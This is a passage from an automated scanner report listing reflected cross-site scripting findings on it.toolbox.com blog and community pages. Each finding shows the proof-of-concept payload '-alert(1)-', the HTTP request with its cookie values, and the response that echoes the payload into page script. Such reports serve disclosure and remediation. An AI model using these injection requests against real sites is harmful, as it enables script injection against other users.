<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Technical D ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38720%267966f'-alert(1)-'717976eea32%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb910'-alert(1)-'cf3f8d419ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/cb910'-alert(1)-'cf3f8d419ca HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cb910'-alert(1)-'cf3f8d419ca'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.78. http://it.toolbox.com/blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9947e'-alert(1)-'b768ccdb619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-check-box-how-flaky-practices-get-encoded-into-your-business-42620?9947e'-alert(1)-'b768ccdb619=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69445
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Check B ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42620%269947e'-alert(1)-'b768ccdb619%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb19'-alert(1)-'c89de4fa829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/6fb19'-alert(1)-'c89de4fa829 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%266fb19'-alert(1)-'c89de4fa829'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.80. http://it.toolbox.com/blogs/ppmtoday/the-emergent-comedy-39924 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/the-emergent-comedy-39924
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670b8'-alert(1)-'7dcaf45a1ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-emergent-comedy-39924?670b8'-alert(1)-'7dcaf45a1ad=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68919 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:38 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Emergen ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39924%26670b8'-alert(1)-'7dcaf45a1ad%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c0c4'-alert(1)-'6f5648481ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/2c0c4'-alert(1)-'6f5648481ff HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%262c0c4'-alert(1)-'6f5648481ff'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.82. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/the-wocket-in-your-pocket-42008
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e9d'-alert(1)-'a125a80c31c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008?b5e9d'-alert(1)-'a125a80c31c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 69550 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:35 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> The Wocket ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42008%26b5e9d'-alert(1)-'a125a80c31c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3d0'-alert(1)-'863012dc017 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/cd3d0'-alert(1)-'863012dc017 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26cd3d0'-alert(1)-'863012dc017'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.84. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/two-old-pals-41071
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f617'-alert(1)-'679cdacb38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/two-old-pals-41071?5f617'-alert(1)-'679cdacb38f=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68775 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Two Old Pal ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41071%265f617'-alert(1)-'679cdacb38f%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a8a5'-alert(1)-'91b7ec83dbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/4a8a5'-alert(1)-'91b7ec83dbe HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%264a8a5'-alert(1)-'91b7ec83dbe'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.86. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/venture-and-gender-43847
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee209'-alert(1)-'185afe72fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 66189 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:26 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Venture and ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43847%26ee209'-alert(1)-'185afe72fe1%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0965'-alert(1)-'e613cc08901 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/d0965'-alert(1)-'e613cc08901 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26d0965'-alert(1)-'e613cc08901'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.88. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/why-should-i-change-40067
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cff'-alert(1)-'27a3eb6d893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81340 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:17 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Why Should ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40067%2628cff'-alert(1)-'27a3eb6d893%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.89. http://it.toolbox.com/communities/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/communities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75c02'-alert(1)-'c6fa87a6781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /communities/?75c02'-alert(1)-'c6fa87a6781=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48832 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2funicorn%2fCommunityDirectory.aspx%2f%3f75c02'-alert(1)-'c6fa87a6781%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.90. http://it.toolbox.com/groups/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/groups/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 341e6'-alert(1)-'a97f04ef44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups/?341e6'-alert(1)-'a97f04ef44c=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79118 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:48:50 GMT Connection: close
